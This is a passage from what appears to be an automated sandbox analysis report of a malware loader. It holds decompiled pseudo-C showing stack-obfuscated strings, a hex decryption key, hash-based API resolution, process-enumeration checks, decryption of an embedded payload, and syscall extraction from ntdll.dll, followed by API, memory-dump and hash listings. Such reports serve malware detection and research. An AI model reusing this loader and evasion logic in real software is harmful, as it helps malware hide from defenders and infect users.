                                                                                    				void* _t204;
                                                                                    				void* _t210;
                                                                                    				signed int _t211;
                                                                                    				void* _t212;
                                                                                    				int _t214;
                                                                                    				intOrPtr _t222;
                                                                                    				signed int _t232;
                                                                                    				signed int _t242;
                                                                                    				signed int _t244;
                                                                                    				signed int _t245;
                                                                                    				void* _t247;
                                                                                    				signed int _t248;
                                                                                    				void* _t250;
                                                                                    				signed int _t251;
                                                                                    				void* _t253;
                                                                                    				void* _t259;
                                                                                    				void* _t260;
                                                                                    
                                                                                    				_t260 = __eflags;
                                                                                    				_v24 = _v24 & 0x00000000;
                                                                                    				_v140 = _v140 & 0x00000000;
                                                                                    				_v72 = 0x64;
                                                                                    				_v71 = 0x35;
                                                                                    				_v70 = 0x64;
                                                                                    				_v69 = 0x38;
                                                                                    				_v68 = 0x66;
                                                                                    				_v67 = 0x36;
                                                                                    				_v66 = 0x61;
                                                                                    				_v65 = 0x38;
                                                                                    				_v64 = 0x30;
                                                                                    				_v63 = 0x30;
                                                                                    				_v62 = 0x64;
                                                                                    				_v61 = 0x33;
                                                                                    				_v60 = 0x34;
                                                                                    				_v59 = 0x63;
                                                                                    				_v58 = 0x63;
                                                                                    				_v57 = 0x38;
                                                                                    				_v56 = 0x61;
                                                                                    				_v55 = 0x34;
                                                                                    				_v54 = 0x33;
                                                                                    				_v53 = 0x62;
                                                                                    				_v52 = 0x35;
                                                                                    				_v51 = 0x39;
                                                                                    				_v50 = 0x37;
                                                                                    				_v49 = 0x63;
                                                                                    				_v48 = 0x62;
                                                                                    				_v47 = 0x64;
                                                                                    				_v46 = 0x66;
                                                                                    				_v45 = 0x35;
                                                                                    				_v44 = 0x39;
                                                                                    				_v43 = 0x31;
                                                                                    				_v42 = 0x66;
                                                                                    				_v41 = 0x35;
                                                                                    				_v40 = 0;
                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                    				_v76 = _v76 & 0x00000000;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_v20 = _v20 & 0x00000000;
                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                    				_t172 = 0x65;
                                                                                    				_v124 = _t172;
                                                                                    				_t173 = 0x65;
                                                                                    				_v122 = _t173;
                                                                                    				_t174 = 0x79;
                                                                                    				_v120 = _t174;
                                                                                    				_t175 = 0x73;
                                                                                    				_v118 = _t175;
                                                                                    				_t176 = 0x6e;
                                                                                    				_v116 = _t176;
                                                                                    				_t177 = 0x32;
                                                                                    				_v114 = _t177;
                                                                                    				_t178 = 0x63;
                                                                                    				_v112 = _t178;
                                                                                    				_t179 = 0x75;
                                                                                    				_v110 = _t179;
                                                                                    				_t180 = 0x6e;
                                                                                    				_v108 = _t180;
                                                                                    				_t181 = 0x63;
                                                                                    				_v106 = _t181;
                                                                                    				_t182 = 0x65;
                                                                                    				_v104 = _t182;
                                                                                    				_t183 = 0x68;
                                                                                    				_v102 = _t183;
                                                                                    				_t184 = 0x39;
                                                                                    				_v100 = _t184;
                                                                                    				_t185 = 0x2e;
                                                                                    				_v98 = _t185;
                                                                                    				_t186 = 0x64;
                                                                                    				_v96 = _t186;
                                                                                    				_t187 = 0x6c;
                                                                                    				_v94 = _t187;
                                                                                    				_t188 = 0x6c;
                                                                                    				_v92 = _t188;
                                                                                    				_v90 = 0;
                                                                                    				_v8 = E737946E6();
                                                                                    				_v84 = E7379478E(_v8, 0x34cf0bf);
                                                                                    				_v88 = E7379478E(_v8, 0x55e38b1f);
                                                                                    				_v128 = E7379478E(_v8, 0xd1775dc4);
                                                                                    				_v180 = E7379478E(_v8, 0xd6eb2188);
                                                                                    				_v160 = E7379478E(_v8, 0xa2eae210);
                                                                                    				_v184 = E7379478E(_v8, 0xcd8538b2);
                                                                                    				_v132 = E7379478E(_v8, 0x8a111d91);
                                                                                    				_v136 = E7379478E(_v8, 0x170c1ca1);
                                                                                    				_v80 = E7379478E(_v8, 0xa5f15738);
                                                                                    				_v144 = E7379478E(_v8, 0x433a3842);
                                                                                    				_v156 = E7379478E(_v8, 0x2ffe2c64);
                                                                                    				_v176 = 0x2d734193;
                                                                                    				_v172 = 0x63daa681;
                                                                                    				_v168 = 0x26090612;
                                                                                    				_v164 = 0x6f28fae0;
                                                                                    				_t202 = 4;
                                                                                    				_t204 = E73794225(_t260,  *((intOrPtr*)(_t259 + _t202 * 0 - 0xac))); // executed
                                                                                    				_t261 = _t204;
                                                                                    				if(_t204 != 0) {
                                                                                    					L4:
                                                                                    					_v84(0x7918);
                                                                                    					L5:
                                                                                    					_v128(0,  &_v1308, 0x103);
                                                                                    					_t210 = CreateFileW(E737948E9(_t264,  &_v124), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                    					_v24 = _t210;
                                                                                    					if(_v24 != 0xffffffff) {
                                                                                    						_t211 = _v136(_v24, 0);
                                                                                    						_v16 = _t211;
                                                                                    						__eflags = _v16 - 0xffffffff;
                                                                                    						if(_v16 != 0xffffffff) {
                                                                                    							_t212 = VirtualAlloc(0, _v16, 0x3000, 4);
                                                                                    							_v12 = _t212;
                                                                                    							__eflags = _v12;
                                                                                    							if(_v12 != 0) {
                                                                                    								_t214 = ReadFile(_v24, _v12, _v16,  &_v140, 0);
                                                                                    								__eflags = _t214;
                                                                                    								if(_t214 != 0) {
                                                                                    									_v148 = _v12;
                                                                                    									_v28 = _v12 +  *((intOrPtr*)(_v148 + 0x3c));
                                                                                    									_t256 = _v28;
                                                                                    									_v152 = _v28 + ( *(_v28 + 0x14) & 0x0000ffff) + 0x18;
                                                                                    									_v20 =  *((intOrPtr*)(_v28 + 0x54));
                                                                                    									_v32 = _v32 & 0x00000000;
                                                                                    									while(1) {
                                                                                    										_t222 = _v28;
                                                                                    										__eflags = _v32 - ( *(_t222 + 6) & 0x0000ffff);
                                                                                    										if(_v32 >= ( *(_t222 + 6) & 0x0000ffff)) {
                                                                                    											break;
                                                                                    										}
                                                                                    										_t242 = _v32 * 0x28;
                                                                                    										_t256 = _v152;
                                                                                    										_t257 = _v20 +  *((intOrPtr*)(_t256 + _t242 + 0x10));
                                                                                    										_v20 = _v20 +  *((intOrPtr*)(_t256 + _t242 + 0x10));
                                                                                    										_t244 = _v32 + 1;
                                                                                    										__eflags = _t244;
                                                                                    										_v32 = _t244;
                                                                                    									}
                                                                                    									_v76 = _v16 - _v20;
                                                                                    									_v36 = VirtualAlloc(0, _v76, 0x3000, 4);
                                                                                    									E737946FE(_t256, _v36, _v12 + _v20, _v76);
                                                                                    									_t159 =  &_v72; // 0x64
                                                                                    									E73794029(_v36, _t159, 0x20);
                                                                                    									_t232 = E73793034(_t256, _t257, __eflags, _v36); // executed
                                                                                    									__eflags = _t232;
                                                                                    									if(_t232 != 0) {
                                                                                    										_v84(0xbb8);
                                                                                    										E73793005(_t256,  &_v200, 0x10);
                                                                                    										E73793005(_t256,  &_v268, 0x44);
                                                                                    										_t232 = _v160( &_v1308, _v156(0, 0, 0, 0x20, 0, 0,  &_v268,  &_v200));
                                                                                    										__eflags = _t232;
                                                                                    										if(_t232 != 0) {
                                                                                    											_t232 = _v88(0);
                                                                                    										}
                                                                                    									}
                                                                                    									ExitProcess(0);
                                                                                    								}
                                                                                    								return _t214;
                                                                                    							}
                                                                                    							return _t212;
                                                                                    						}
                                                                                    						return _t211;
                                                                                    					}
                                                                                    					return _t210;
                                                                                    				}
                                                                                    				_t245 = 4;
                                                                                    				_t247 = E73794225(_t261,  *((intOrPtr*)(_t259 + (_t245 << 0) - 0xac))); // executed
                                                                                    				_t262 = _t247;
                                                                                    				if(_t247 != 0) {
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				_t248 = 4;
                                                                                    				_t250 = E73794225(_t262,  *((intOrPtr*)(_t259 + (_t248 << 1) - 0xac))); // executed
                                                                                    				_t263 = _t250;
                                                                                    				if(_t250 != 0) {
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				_t251 = 4;
                                                                                    				_t253 = E73794225(_t263,  *((intOrPtr*)(_t259 + _t251 * 3 - 0xac))); // executed
                                                                                    				_t264 = _t253;
                                                                                    				if(_t253 == 0) {
                                                                                    					goto L5;
                                                                                    				}
                                                                                    				goto L4;
                                                                                    			}























































































































                                                                                    0x737942c8
                                                                                    0x737942d1
                                                                                    0x737942d5
                                                                                    0x737942dc
                                                                                    0x737942e0
                                                                                    0x737942e4
                                                                                    0x737942e8
                                                                                    0x737942ec
                                                                                    0x737942f0
                                                                                    0x737942f4
                                                                                    0x737942f8
                                                                                    0x737942fc
                                                                                    0x73794300
                                                                                    0x73794304
                                                                                    0x73794308
                                                                                    0x7379430c
                                                                                    0x73794310
                                                                                    0x73794314
                                                                                    0x73794318
                                                                                    0x7379431c
                                                                                    0x73794320
                                                                                    0x73794324
                                                                                    0x73794328
                                                                                    0x7379432c
                                                                                    0x73794330
                                                                                    0x73794334
                                                                                    0x73794338
                                                                                    0x7379433c
                                                                                    0x73794340
                                                                                    0x73794344
                                                                                    0x73794348
                                                                                    0x7379434c
                                                                                    0x73794350
                                                                                    0x73794354
                                                                                    0x73794358
                                                                                    0x7379435c
                                                                                    0x73794360
                                                                                    0x73794364
                                                                                    0x73794368
                                                                                    0x7379436c
                                                                                    0x73794370
                                                                                    0x73794376
                                                                                    0x73794377
                                                                                    0x7379437d
                                                                                    0x7379437e
                                                                                    0x73794384
                                                                                    0x73794385
                                                                                    0x7379438b
                                                                                    0x7379438c
                                                                                    0x73794392
                                                                                    0x73794393
                                                                                    0x73794399
                                                                                    0x7379439a
                                                                                    0x737943a0
                                                                                    0x737943a1
                                                                                    0x737943a7
                                                                                    0x737943a8
                                                                                    0x737943ae
                                                                                    0x737943af
                                                                                    0x737943b5
                                                                                    0x737943b6
                                                                                    0x737943bc
                                                                                    0x737943bd
                                                                                    0x737943c3
                                                                                    0x737943c4
                                                                                    0x737943ca
                                                                                    0x737943cb
                                                                                    0x737943d1
                                                                                    0x737943d2
                                                                                    0x737943d8
                                                                                    0x737943d9
                                                                                    0x737943df
                                                                                    0x737943e0
                                                                                    0x737943e6
                                                                                    0x737943e7
                                                                                    0x737943ed
                                                                                    0x737943f6
                                                                                    0x73794406
                                                                                    0x73794416
                                                                                    0x73794426
                                                                                    0x73794436
                                                                                    0x73794449
                                                                                    0x7379445c
                                                                                    0x7379446f
                                                                                    0x7379447f
                                                                                    0x73794492
                                                                                    0x737944a2
                                                                                    0x737944b5
                                                                                    0x737944bb
                                                                                    0x737944c5
                                                                                    0x737944cf
                                                                                    0x737944d9
                                                                                    0x737944e5
                                                                                    0x737944f0
                                                                                    0x737944f5
                                                                                    0x737944f7
                                                                                    0x7379453a
                                                                                    0x7379453f
                                                                                    0x73794542
                                                                                    0x73794550
                                                                                    0x7379456f
                                                                                    0x73794572
                                                                                    0x73794579
                                                                                    0x73794585
                                                                                    0x7379458b
                                                                                    0x7379458e
                                                                                    0x73794592
                                                                                    0x737945a5
                                                                                    0x737945a8
                                                                                    0x737945ab
                                                                                    0x737945af
                                                                                    0x737945c8
                                                                                    0x737945ce
                                                                                    0x737945d0
                                                                                    0x737945da
                                                                                    0x737945ec
                                                                                    0x737945f6
                                                                                    0x737945fd
                                                                                    0x73794609
                                                                                    0x7379460c
                                                                                    0x73794619
                                                                                    0x73794619
                                                                                    0x73794620
                                                                                    0x73794623
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794625
                                                                                    0x73794629
                                                                                    0x73794632
                                                                                    0x73794636
                                                                                    0x73794615
                                                                                    0x73794615
                                                                                    0x73794616
                                                                                    0x73794616
                                                                                    0x73794641
                                                                                    0x73794653
                                                                                    0x73794663
                                                                                    0x7379466a
                                                                                    0x73794671
                                                                                    0x73794679
                                                                                    0x7379467e
                                                                                    0x73794680
                                                                                    0x73794687
                                                                                    0x73794693
                                                                                    0x737946a1
                                                                                    0x737946ce
                                                                                    0x737946d4
                                                                                    0x737946d6
                                                                                    0x737946da
                                                                                    0x737946da
                                                                                    0x737946d6
                                                                                    0x737946df
                                                                                    0x737946df
                                                                                    0x00000000
                                                                                    0x737945d0
                                                                                    0x00000000
                                                                                    0x737945af
                                                                                    0x00000000
                                                                                    0x73794592
                                                                                    0x00000000
                                                                                    0x73794579
                                                                                    0x737944fb
                                                                                    0x73794506
                                                                                    0x7379450b
                                                                                    0x7379450d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794511
                                                                                    0x7379451b
                                                                                    0x73794520
                                                                                    0x73794522
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73794526
                                                                                    0x73794531
                                                                                    0x73794536
                                                                                    0x73794538
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000

                                                                                    APIs
                                                                                      • Part of subcall function 73794225: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 7379426A
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7379456F
                                                                                      • Part of subcall function 73794225: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 7379428E
                                                                                    • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 737945A5
                                                                                      • Part of subcall function 73794225: Process32NextW.KERNEL32(000000FF,0000022C), ref: 737942B9
                                                                                    • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 737945C8
                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 73794650
                                                                                    • ExitProcess.KERNEL32(00000000,00000000,00000000,00000000), ref: 737946DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocCreateFileProcess32Virtual$ExitFirstNextProcessReadSnapshotToolhelp32
                                                                                    • String ID: d5d8f6a800d34cc8a43b597cbdf591f5
                                                                                    • API String ID: 3683539093-1067640823
                                                                                    • Opcode ID: 1685f746481d3adc4da5d9f7ad9d2ba8a94fc16a290170efc9d95cfcbe809e92
                                                                                    • Instruction ID: b039ca52d1a99a082003ec24566ef60617cc6b802d9aa61aa5c866f0c58bef42
                                                                                    • Opcode Fuzzy Hash: 1685f746481d3adc4da5d9f7ad9d2ba8a94fc16a290170efc9d95cfcbe809e92
                                                                                    • Instruction Fuzzy Hash: 13D17730D04358EEFF21CBE4ED4ABEDBBB5AF04704F10419AE604BA291D7B50A54DB29
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 69%
                                                                                    			E7379370F(intOrPtr _a4) {
                                                                                    				signed int _v8;
                                                                                    				void* _v12;
                                                                                    				void* _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				void* _v24;
                                                                                    				signed int _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				signed int _v36;
                                                                                    				intOrPtr _v40;
                                                                                    				signed int _v44;
                                                                                    				signed int _v48;
                                                                                    				intOrPtr _v52;
                                                                                    				intOrPtr _v56;
                                                                                    				intOrPtr _v60;
                                                                                    				intOrPtr _v64;
                                                                                    				intOrPtr _v68;
                                                                                    				intOrPtr _v72;
                                                                                    				void* _v76;
                                                                                    				intOrPtr _v80;
                                                                                    				signed char _v84;
                                                                                    				long _v88;
                                                                                    				short _v90;
                                                                                    				short _v92;
                                                                                    				short _v94;
                                                                                    				short _v96;
                                                                                    				short _v98;
                                                                                    				short _v100;
                                                                                    				short _v102;
                                                                                    				short _v104;
                                                                                    				short _v106;
                                                                                    				char _v108;
                                                                                    				short _t141;
                                                                                    				short _t142;
                                                                                    				short _t143;
                                                                                    				short _t144;
                                                                                    				short _t145;
                                                                                    				short _t146;
                                                                                    				short _t147;
                                                                                    				short _t148;
                                                                                    				short _t149;
                                                                                    				int _t165;
                                                                                    				signed int _t169;
                                                                                    				intOrPtr _t175;
                                                                                    				signed int _t195;
                                                                                    				signed int _t210;
                                                                                    				signed int _t222;
                                                                                    
                                                                                    				_v24 = _v24 & 0x00000000;
                                                                                    				_v48 = _v48 & 0x00000000;
                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                    				_t141 = 0x6e;
                                                                                    				_v108 = _t141;
                                                                                    				_t142 = 0x74;
                                                                                    				_v106 = _t142;
                                                                                    				_t143 = 0x64;
                                                                                    				_v104 = _t143;
                                                                                    				_t144 = 0x6c;
                                                                                    				_v102 = _t144;
                                                                                    				_t145 = 0x6c;
                                                                                    				_v100 = _t145;
                                                                                    				_t146 = 0x2e;
                                                                                    				_v98 = _t146;
                                                                                    				_t147 = 0x64;
                                                                                    				_v96 = _t147;
                                                                                    				_t148 = 0x6c;
                                                                                    				_v94 = _t148;
                                                                                    				_t149 = 0x6c;
                                                                                    				_v92 = _t149;
                                                                                    				_v90 = 0;
                                                                                    				_v16 = _v16 & 0x00000000;
                                                                                    				_v12 = _v12 & 0x00000000;
                                                                                    				_v36 = _v36 & 0x00000000;
                                                                                    				_t23 =  &_v44;
                                                                                    				 *_t23 = _v44 & 0x00000000;
                                                                                    				_t222 =  *_t23;
                                                                                    				_v20 = E737946E6();
                                                                                    				_v64 = E7379478E(_v20, 0x8a111d91);
                                                                                    				_v68 = E7379478E(_v20, 0x170c1ca1);
                                                                                    				_v52 = E7379478E(_v20, 0xa5f15738);
                                                                                    				_v72 = E7379478E(_v20, 0x433a3842);
                                                                                    				_v56 = E7379478E(_v20, 0xd6eb2188);
                                                                                    				_v60 = E7379478E(_v20, 0x50a26af);
                                                                                    				_v80 = E7379478E(_v20, 0x55e38b1f);
                                                                                    				_v44 = 1;
                                                                                    				while(1) {
                                                                                    					_v16 = CreateFileW(E737948E9(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                    					if(_v16 == 0xffffffff) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_v36 = _v68(_v16, 0);
                                                                                    					__eflags = _v36 - 0xffffffff;
                                                                                    					if(_v36 != 0xffffffff) {
                                                                                    						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                    						__eflags = _v12;
                                                                                    						if(_v12 != 0) {
                                                                                    							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                    							__eflags = _t165;
                                                                                    							if(_t165 != 0) {
                                                                                    								_v76 = _v12;
                                                                                    								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                                                    								_t169 =  *(_v32 + 0x14) & 0x0000ffff;
                                                                                    								_t213 = _v32;
                                                                                    								_t68 = _t169 + 0x18; // 0x8000018
                                                                                    								_v40 = _v32 + _t68;
                                                                                    								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                    								__eflags = _v24;
                                                                                    								if(_v24 != 0) {
                                                                                    									E737946FE(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                    									_v28 = _v28 & 0x00000000;
                                                                                    									while(1) {
                                                                                    										_t175 = _v32;
                                                                                    										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                    										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                    											break;
                                                                                    										}
                                                                                    										E737946FE(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                                                    										_t210 = _v28 + 1;
                                                                                    										__eflags = _t210;
                                                                                    										_v28 = _t210;
                                                                                    									}
                                                                                    									_v48 = E7379478E(_v24, _a4);
                                                                                    									__eflags = _v48;
                                                                                    									if(_v48 != 0) {
                                                                                    										__eflags = _v16;
                                                                                    										if(_v16 != 0) {
                                                                                    											FindCloseChangeNotification(_v16);
                                                                                    										}
                                                                                    										__eflags = _v12;
                                                                                    										if(_v12 != 0) {
                                                                                    											VirtualFree(_v12, 0, 0x8000);
                                                                                    										}
                                                                                    										_v44 = _v44 & 0x00000000;
                                                                                    										__eflags = 0;
                                                                                    										if(0 != 0) {
                                                                                    											continue;
                                                                                    										}
                                                                                    									} else {
                                                                                    									}
                                                                                    								} else {
                                                                                    								}
                                                                                    							} else {
                                                                                    							}
                                                                                    						} else {
                                                                                    						}
                                                                                    					} else {
                                                                                    					}
                                                                                    					L22:
                                                                                    					if(_v44 != 0) {
                                                                                    						if(_v16 != 0) {
                                                                                    							_v56(_v16);
                                                                                    						}
                                                                                    						_v80(0);
                                                                                    					}
                                                                                    					_v8 = _v48;
                                                                                    					while(1 != 0) {
                                                                                    						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                    							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                    							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                    								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                    								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                    									_t195 = _v8 + 1;
                                                                                    									__eflags = _t195;
                                                                                    									_v8 = _t195;
                                                                                    								} else {
                                                                                    									_v8 =  *(_v8 + 1);
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                    								_v8 = _v8 + _t125;
                                                                                    							}
                                                                                    							continue;
                                                                                    						} else {
                                                                                    						}
                                                                                    						break;
                                                                                    					}
                                                                                    					_v8 = _v8 + 1;
                                                                                    					_v84 =  *_v8;
                                                                                    					if(_v24 != 0) {
                                                                                    						VirtualFree(_v24, 0, 0x8000);
                                                                                    					}
                                                                                    					return _v84;
                                                                                    				}
                                                                                    				goto L22;
                                                                                    			}

















































                                                                                    0x73793715
                                                                                    0x73793719
                                                                                    0x7379371d
                                                                                    0x73793723
                                                                                    0x73793724
                                                                                    0x7379372a
                                                                                    0x7379372b
                                                                                    0x73793731
                                                                                    0x73793732
                                                                                    0x73793738
                                                                                    0x73793739
                                                                                    0x7379373f
                                                                                    0x73793740
                                                                                    0x73793746
                                                                                    0x73793747
                                                                                    0x7379374d
                                                                                    0x7379374e
                                                                                    0x73793754
                                                                                    0x73793755
                                                                                    0x7379375b
                                                                                    0x7379375c
                                                                                    0x73793762
                                                                                    0x73793766
                                                                                    0x7379376a
                                                                                    0x7379376e
                                                                                    0x73793772
                                                                                    0x73793772
                                                                                    0x73793772
                                                                                    0x7379377b
                                                                                    0x7379378b
                                                                                    0x7379379b
                                                                                    0x737937ab
                                                                                    0x737937bb
                                                                                    0x737937cb
                                                                                    0x737937db
                                                                                    0x737937eb
                                                                                    0x737937ee
                                                                                    0x737937f5
                                                                                    0x73793814
                                                                                    0x7379381b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x7379382a
                                                                                    0x7379382d
                                                                                    0x73793831
                                                                                    0x73793847
                                                                                    0x7379384a
                                                                                    0x7379384e
                                                                                    0x73793864
                                                                                    0x73793867
                                                                                    0x73793869
                                                                                    0x73793873
                                                                                    0x7379387f
                                                                                    0x73793885
                                                                                    0x73793889
                                                                                    0x7379388c
                                                                                    0x73793890
                                                                                    0x737938a5
                                                                                    0x737938a8
                                                                                    0x737938ac
                                                                                    0x737938bf
                                                                                    0x737938c4
                                                                                    0x737938d1
                                                                                    0x737938d1
                                                                                    0x737938d8
                                                                                    0x737938db
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73793906
                                                                                    0x737938cd
                                                                                    0x737938cd
                                                                                    0x737938ce
                                                                                    0x737938ce
                                                                                    0x73793918
                                                                                    0x7379391b
                                                                                    0x7379391f
                                                                                    0x73793923
                                                                                    0x73793927
                                                                                    0x7379392c
                                                                                    0x7379392c
                                                                                    0x7379392f
                                                                                    0x73793933
                                                                                    0x7379393f
                                                                                    0x7379393f
                                                                                    0x73793942
                                                                                    0x73793946
                                                                                    0x73793948
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x73793921
                                                                                    0x00000000
                                                                                    0x737938ae
                                                                                    0x00000000
                                                                                    0x7379386b
                                                                                    0x00000000
                                                                                    0x73793850
                                                                                    0x00000000
                                                                                    0x73793833
                                                                                    0x7379394e
                                                                                    0x73793952
                                                                                    0x73793958
                                                                                    0x7379395d
                                                                                    0x7379395d
                                                                                    0x73793962
                                                                                    0x73793962
                                                                                    0x73793968
                                                                                    0x7379396b
                                                                                    0x7379397b
                                                                                    0x73793985
                                                                                    0x7379398a
                                                                                    0x737939a4
                                                                                    0x737939a9
                                                                                    0x737939b9
                                                                                    0x737939b9
                                                                                    0x737939ba
                                                                                    0x737939ab
                                                                                    0x737939b1
                                                                                    0x737939b1
                                                                                    0x7379398c
                                                                                    0x73793995
                                                                                    0x73793999
                                                                                    0x73793999
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x7379397d
                                                                                    0x00000000
                                                                                    0x7379397b
                                                                                    0x737939c3
                                                                                    0x737939cb
                                                                                    0x737939d2
                                                                                    0x737939de
                                                                                    0x737939de
                                                                                    0x737939e7
                                                                                    0x737939e7
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 73793811
                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 737939DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.223621335.0000000073793000.00000040.00020000.sdmp, Offset: 73790000, based on PE: true
                                                                                    • Associated: 00000000.00000002.223574209.0000000073790000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223588828.0000000073791000.00000020.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223600635.0000000073792000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.223638092.0000000073795000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateFileFreeVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 204039940-0
                                                                                    • Opcode ID: cfb8805cce7f14ed68710719503e796ee486ae88872c1886ab32e4ed3e39de44
                                                                                    • Instruction ID: 379a4de2a6d3bb6314f1196f81d51042774bcea6381b7cfa9cbaab9f2a03b887
                                                                                    • Opcode Fuzzy Hash: cfb8805cce7f14ed68710719503e796ee486ae88872c1886ab32e4ed3e39de44
                                                                                    • Instruction Fuzzy Hash: 0DA10334D00219EFEB11CFE4E989BADBBB5FF08325F20465AE511BB290D3755A40DB18
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405EE9(intOrPtr _a4) {
                                                                                    				char _v292;
                                                                                    				int _t10;
                                                                                    				struct HINSTANCE__* _t14;
                                                                                    				void* _t16;
                                                                                    				void* _t21;
                                                                                    
                                                                                    				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                    				if(_t10 > 0x104) {
                                                                                    					_t10 = 0;
                                                                                    				}
                                                                                    				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                    					_t16 = 1;
                                                                                    				} else {
                                                                                    					_t16 = 0;
                                                                                    				}
                                                                                    				_t5 = _t16 + 0x409010; // 0x5c
                                                                                    				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                    				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                    				return _t14;
                                                                                    			}








                                                                                    0x00405f00
                                                                                    0x00405f09
                                                                                    0x00405f0b
                                                                                    0x00405f0b
                                                                                    0x00405f0f
                                                                                    0x00405f21
                                                                                    0x00405f1b
                                                                                    0x00405f1b
                                                                                    0x00405f1b
                                                                                    0x00405f25
                                                                                    0x00405f39
                                                                                    0x00405f4d
                                                                                    0x00405f54

                                                                                    APIs
                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00405F00
                                                                                    • wsprintfA.USER32 ref: 00405F39
                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                    • API String ID: 2200240437-4240819195
                                                                                    • Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
                                                                                    • Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
                                                                                    • Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
